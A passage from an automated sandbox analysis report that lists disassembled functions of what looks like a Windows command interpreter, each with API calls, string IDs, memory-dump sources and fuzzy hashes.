                                        • Instruction Fuzzy Hash: F7315F21B0C50295FB107F62E85567AB69AAF94BB4FC88035DF2E46695FE3CE600C730
                                        Function 00007FF7CD4B0C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                        • String ID: &()[]{}^=;!%'+,`~
                                        • API String ID: 2516562204-381716982
                                        • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                        • Instruction ID: bd707b1cc7222ae83c38b5465fe82a298b9026ff0652d5c429896487e0328b72
                                        • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                        • Instruction Fuzzy Hash: 00C1D032B08A9186E750AF65E8402BEB7A1FB54BA5F801135EF9D03B98EF3CE550C710
                                        Function 00007FF7CD497E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD48D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D46E
                                          • Part of subcall function 00007FF7CD48D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D485
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D4EE
                                          • Part of subcall function 00007FF7CD48D3F0: iswspace.MSVCRT ref: 00007FF7CD48D54D
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D569
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D58C
                                        • iswspace.MSVCRT ref: 00007FF7CD497EEE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                        • String ID: A
                                        • API String ID: 3731854180-3554254475
                                        • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                        • Instruction ID: 1d990b80358f498c4672fffeeb28a5c0cea5f9e3c1ac3af7e69fda931794c4dc
                                        • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                        • Instruction Fuzzy Hash: 56A18E21B0D64286E660BF52A45067DFBA5FB997A1F808035CF6D47798FF3CA641CB20
                                        Function 00007FF7CD4AA39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                        • String ID: NTDLL.DLL$NtQueryInformationProcess
                                        • API String ID: 1580871199-2613899276
                                        • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                        • Instruction ID: 91418796ee1825daac22deab3be43ef2c812714ba747299b6d11db00f0d01446
                                        • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                        • Instruction Fuzzy Hash: CC516D71B1CB8282EB50AF56A844279F7A5FB88BA4F845135EEAE07754EF3CD201C714
                                        Function 00007FF7CD487420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                        • String ID: con
                                        • API String ID: 689241570-4257191772
                                        • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                        • Instruction ID: 1356fadb7746433e777cbee8385e44a40a12ac8f6e42d2780001901f1ec4c242
                                        • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                        • Instruction Fuzzy Hash: B8418F32B0CA4586E210AF15A484379BAA5FB89BB4F948334DF3D53790EF3CDA498750
                                        Function 00007FF7CD4AA58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                        • String ID: PE
                                        • API String ID: 2941894976-4258593460
                                        • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                        • Instruction ID: fb7badd70ec7be572aae6f223bf93bb2151ecf80b5bf346194cb778309efe392
                                        • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                        • Instruction Fuzzy Hash: 7141863170C64186EA20AF15E455279F7A1FB89BA0F844134DFAD03B95EF3CE545CB20
                                        Function 00007FF7CD490010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7CD4A849D,?,?,?,00007FF7CD4AF0C7), ref: 00007FF7CD490045
                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7CD4AF0C7,?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD490071
                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD490092
                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7CD4900A7
                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD490148
                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7CD490181
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                        • String ID:
                                        • API String ID: 734197835-0
                                        • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                        • Instruction ID: b8ba898fc933f2e67012cd421ae0a9143a285e6fe9949ac9fccd564d16ae33dd
                                        • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                        • Instruction Fuzzy Hash: 4E61B531B0C69296E720AF16A804739FBA6BB49765F848131DF6E03794FF3DA645C710
                                        Function 00007FF7CD4A9B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Enum$Openwcsrchr
                                        • String ID: %s=%s$.$\Shell\Open\Command
                                        • API String ID: 3402383852-1459555574
                                        • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                        • Instruction ID: 9e12b4513baa89788baad19acefcc0558cac7d0340b6862465f0231dc8299744
                                        • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                        • Instruction Fuzzy Hash: 0FA1A121B0CA8292EA10AF5594542BAE2A1EF85BA0FC44531DF6E477C5FF7CEB41C720
                                        Function 00007FF7CD497610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$wcscmp
                                        • String ID: %s
                                        • API String ID: 243296809-3043279178
                                        • Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                        • Instruction ID: 7bf07df5edfd7e64d924af501c20f3fa076346c614642d5addb348efba9b929f
                                        • Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                        • Instruction Fuzzy Hash: 29A18C2270DA8696EB21EF22E844BF9A396BB48768F904035DF5D47695EF3CE7448310
                                        Function 00007FF7CD481F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$EnvironmentVariable
                                        • String ID: DIRCMD
                                        • API String ID: 1405722092-1465291664
                                        • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                        • Instruction ID: e15f43fa1cacbadfec85eed35fe3feff0865cf3866f65dcae3f6fcb42f0ab3ba
                                        • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                        • Instruction Fuzzy Hash: 02814C72B08BC18AEB20DF61A8802ED77A5FB44798F904139DF9D57B59EF38D2458710
                                        Function 00007FF7CD4899F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD48CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDA6
                                          • Part of subcall function 00007FF7CD48CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDBD
                                        • wcschr.MSVCRT(?,?,?,00007FF7CD4899DD), ref: 00007FF7CD489A39
                                          • Part of subcall function 00007FF7CD48DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF7CD48CEAA), ref: 00007FF7CD48DFB8
                                          • Part of subcall function 00007FF7CD48DF60: RtlFreeHeap.NTDLL ref: 00007FF7CD48DFCC
                                          • Part of subcall function 00007FF7CD48DF60: _setjmp.MSVCRT ref: 00007FF7CD48E03E
                                        • wcschr.MSVCRT(?,?,?,00007FF7CD4899DD), ref: 00007FF7CD489AF0
                                        • wcschr.MSVCRT(?,?,?,00007FF7CD4899DD), ref: 00007FF7CD489B0F
                                          • Part of subcall function 00007FF7CD4896E8: memset.MSVCRT ref: 00007FF7CD4897B2
                                          • Part of subcall function 00007FF7CD4896E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7CD489880
                                        • _wcsupr.MSVCRT ref: 00007FF7CD49B844
                                        • wcscmp.MSVCRT ref: 00007FF7CD49B86D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                        • String ID: FOR$ IF
                                        • API String ID: 3663254013-2924197646
                                        • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                        • Instruction ID: cf93df99e65922aea80a464eee2f278b589868cd38e141edc3684aefac300212
                                        • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                        • Instruction Fuzzy Hash: 9F518120B0DA4285EE55BF169854579A696BF88BF0BC84634DF7E477D1FF3CA6018320
                                        Function 00007FF7CD48F173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON
                                        Download Yara Rule
                                        APIs
                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F0D6
                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F1BA
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F1E7
                                        • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F1FF
                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F2BB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: iswdigit$iswspacewcschr
                                        • String ID: )$=,;
                                        • API String ID: 1959970872-2167043656
                                        • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                        • Instruction ID: 6bcf1149b944bafa013992cc192756b1a2e1c34b72672c5466ac9a603eedd6cc
                                        • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                        • Instruction Fuzzy Hash: 70419E61F0C65285FBA4AF15A914379F6E0AF507B1FC45032CFAD821A4FF3CA6818B20
                                        Function 00007FF7CD4ABA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                        • String ID: %04X-%04X$:
                                        • API String ID: 930873262-1938371929
                                        • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                        • Instruction ID: 605c9909c0d798856cc884d61a1ebd0fb24614ba40a70aa1788e081a40a54bd4
                                        • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                        • Instruction Fuzzy Hash: ED416121B0CA82D2E760AF65E4542BAF2A1FB85764FC04136DF6E426D5EF3CE645C720
                                        Function 00007FF7CD4936EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                        • API String ID: 3249344982-2616576482
                                        • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                        • Instruction ID: b2b052761bee8f90e345300f186ced72426a92be806872f36e1bcebb518d5385
                                        • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                        • Instruction Fuzzy Hash: A8417072A1CA4186E7109F12A844739FAA6FB99FA4F888234DF5907794DF3CD2148B10
                                        Function 00007FF7CD496A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                        Download Yara Rule
                                        APIs
                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496A73
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496A91
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496AB0
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496AE3
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496B01
                                        Strings
                                        Memory Dump Source
